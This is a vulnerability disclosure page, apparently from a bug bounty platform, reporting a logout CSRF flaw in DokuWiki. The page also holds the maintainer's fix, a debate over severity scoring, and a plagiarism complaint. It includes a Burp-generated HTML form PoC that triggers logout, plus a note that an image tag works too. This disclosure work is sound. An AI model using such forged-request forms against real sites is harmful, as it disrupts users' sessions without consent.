Cross-Site Request Forgery (CSRF) in splitbrain/dokuwiki

Valid

Reported on

Dec 12th 2021


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8800/doku.php">
      <input type="hidden" name="id" value="wiki&#58;welcome" />
      <input type="hidden" name="do" value="logout" />
      <input type="hidden" name="sectok" value="e4e1654b3649a6ba8e7daef724bd54a0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More Detail

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the splitbrain/dokuwiki team within 24 hours. a year ago
We have contacted a member of the splitbrain/dokuwiki team and are waiting to hear back a year ago
Andreas Gohr validated this vulnerability a year ago
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
Andreas Gohr marked this as fixed with commit 6a2553 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Andreas Gohr
a year ago

Maintainer


@admin is there a way to adjust the severity? It's not really high.

KhanhCM
a year ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself. What have you learned after reporting this vulnerability? Just earn the bounty or improve your skills in cybersecurity?

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. The dokuwiki's users will be shocked if they know that their app has a High vulnerability with the impact is just log out a user with no affected to the account, just an annoyance!

Jamie Slome
a year ago

Admin


@splitbrain - absolutely, we can arrange that for you!

Can you advise on a severity score that would be more fitting for the report?

Please can you also create a CVSS vector string using the calculator here:

https://www.first.org/cvss/calculator/3.1

HDVinnie
a year ago

@admin @dev696 has def copy pasted my content from my reports. This should only be a 4.3

Devendra Bhatla
a year ago

Researcher


Hi @admin Please set CVSS to 4.3

Jamie Slome
a year ago

Admin


Can you please provide the CVSS vector string to use for the new CVSS score?

Devendra Bhatla
a year ago

Researcher


@admin Please find the below CVSS Vector string.

CVSS Score = 4.3 CVSS Vector string = CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Jamie Slome
a year ago

Admin


CVSS adjusted from 7.3 to 4.3 - thanks! 🙏

Devendra Bhatla
a year ago

Researcher


Thanks for all your help Jamie as always !

to join this conversation